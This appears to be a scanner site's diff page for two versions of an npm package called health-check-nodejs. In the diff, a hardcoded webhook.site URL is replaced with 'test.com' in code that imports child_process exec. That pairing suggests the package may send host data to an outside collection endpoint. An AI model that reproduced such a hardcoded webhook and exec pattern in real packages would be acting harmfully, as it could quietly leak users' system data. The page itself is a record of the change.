health-check-nodejs 3.16.12 → 3.16.14

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -1,6 +1,6 @@
1
1
  const { exec } = require('child_process');
2
2
 
3
- const WEBHOOK_URL = 'https://webhook.site/b2e95ae8-41db-422c-9195-4ef2b8675cc0?new';
3
+ const WEBHOOK_URL = 'test.com';
4
4
 
5
5
  async function performHealthCheck(fetch) {
6
6
  const healthStatus = { status: 'ok', timestamp: new Date().toISOString() };
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "health-check-nodejs",
3
- "version": "3.16.12",
3
+ "version": "3.16.14",
4
4
  "description": "A health check module for Node.js applications",
5
5
  "main": "index.js",
6
6
  "scripts": {